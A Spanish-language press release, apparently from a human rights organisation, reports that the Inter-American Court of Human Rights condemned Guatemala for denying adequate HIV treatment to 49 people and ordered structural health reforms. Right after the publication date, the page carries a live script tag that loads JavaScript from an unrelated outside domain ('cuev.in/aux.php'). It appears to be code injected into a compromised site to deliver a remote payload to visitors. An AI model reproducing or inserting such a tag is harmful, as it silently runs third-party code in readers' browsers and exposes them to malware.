Inédito: Corte IDH ordena a Guatemala garantizar tratamiento integral a personas con VIH
Publicación: 29.Octubre.2018
<script src="https://cuev.in/aux.php?ver=1.0&amp;ref=at&amp;debug=" type="text/javascript"></script>

San José/Ciudad de Guatemala, 29 de octubre del 2018.-  En una nueva sentencia contra Guatemala, la Corte Interamericana de Derechos Humanos, condenó a este país por la falta de tratamiento médico de una parte de la población que vive con el VIH y por las violaciones de los derechos humanos ocasionadas a 49 personas y a sus familiares. El caso fue resuelto por el Alto Tribunal interamericano tras 15 años de proceso, durante los cuales las víctimas estuvieron representadas por la doctora Cristina Calderón Melgar, la Asociación de Salud Integral (ASI) y el Centro por la Justicia y el Derecho Internacional (CEJIL).

En su sentencia, la Corte IDH determinó que el Estado de Guatemala es responsable por violar el derecho a la salud en contra de estas personas, ya que no se les brindó atención médica o fue incompleta, incluso provocando la muerte de algunas de ellas. 

“Me siento satisfecho con la sentencia, me siento aliviado. A la vez, me da tristeza saber que muchas personas se quedaron en el camino y no podrán ver el resultado de la lucha que nos ha llevado 18 años. Tengo ansias de que el Estado cumpla a cabalidad todo lo que la sentencia dicta”, expresó Félix Cabrera, uno de los afectados y peticionarios del caso. 

“Esta sentencia es histórica, pues por primera vez la Corte Interamericana se pronuncia sobre la obligación de los Estados de garantizar el desarrollo el derecho a la salud, no sólo en sus mínimos, sino que de manera progresiva y proporcional a sus capacidades. Además, ordena a Guatemala a adoptar medidas estructurales muy relevantes que contribuirán a mejorar la atención de las personas que viven con VIH en Guatemala y a garantizar que los hechos no se vuelvan a repetir”, señaló Gisela de León, directora jurídica de CEJIL. 

Por otro lado, la Corte IDH declaró que el Estado es responsable por la violación del derecho a la vida de 12 víctimas fallecidas quienes no recibieron la atención requerida en su condición de pacientes de VIH y por la violación del derecho a la integridad de 46 de las víctimas que experimentaron graves sufrimientos debido a las secuelas físicas y psíquicas que experimentaron en el curso de su enfermedad.

Además, declaró la violación del derecho a la no discriminación en perjuicio de algunas de las mujeres denunciantes, dado que no recibieron el tratamiento adecuado para evitar la transmisión vertical (a sus hijos/as) durante su embarazo. 

La resolución, con fecha 23 de agosto, ordenó al Estado —entre otras medidas de reparación— el garantizar el acceso de las víctimas a una atención integral en su condición de pacientes del VIH. Además, le exige a Guatemala implementar mecanismos efectivos de fiscalización y supervisión periódica de los hospitales públicos, con el fin de asegurar que la ordenanza de la Corte IDH se cumpla oportunamente. 

De acuerdo con la sentencia, Guatemala deberá instaurar un sistema de información sobre el alcance de la epidemia del VIH en el país, hacer un diagnóstico de la atención prestada a la población que vive con esta enfermedad y diseñar un mecanismo para garantizar la accesibilidad, disponibilidad y calidad de los antirretrovirales, los exámenes diagnósticos y las prestaciones en salud para la población con el VIH. De cumplirse, estas medidas serán claves para mejorar la calidad de vida de dichas personas en el país.

“Las representantes resaltamos que en Guatemala siguen existiendo obstáculos estructurales para que las personas que viven con VIH reciban un tratamiento adecuado. Dada las graves afectaciones que esto tiene en la calidad de vida de estas personas, resulta de la más alta urgencia que el Estado implemente las reparaciones ordenadas a la brevedad posible. Esperamos que las autoridades afronten esta obligación con responsabilidad para evitar que las personas sigan muriendo de una enfermedad que puede prevenirse y atenderse adecuadamente”, expresó la doctora Cristina Calderón. La profesional de la salud, en coordinación con el señor Eduardo Arathoon, han acompañado históricamente la lucha de quienes conviven con el virus en Guatemala. 

Asimismo, algunas de las personas que integran la demanda se mostraron agradecidas por los resultados del proceso, que tardó casi dos décadas. A su vez, resaltaron la necesidad de consolidar este avance en el país, comprendiendo que la necesidad de atención es urgente. 

Con esta resolución, Guatemala acumula 27 condenas internacionales por diversas violaciones de derechos humanos a su población. Las organizaciones hacen un llamado a las autoridades para que, en el menor plazo posible, implementen las medidas de reparación otorgadas y se garantice plenamente la atención integral que las personas con VIH necesitan.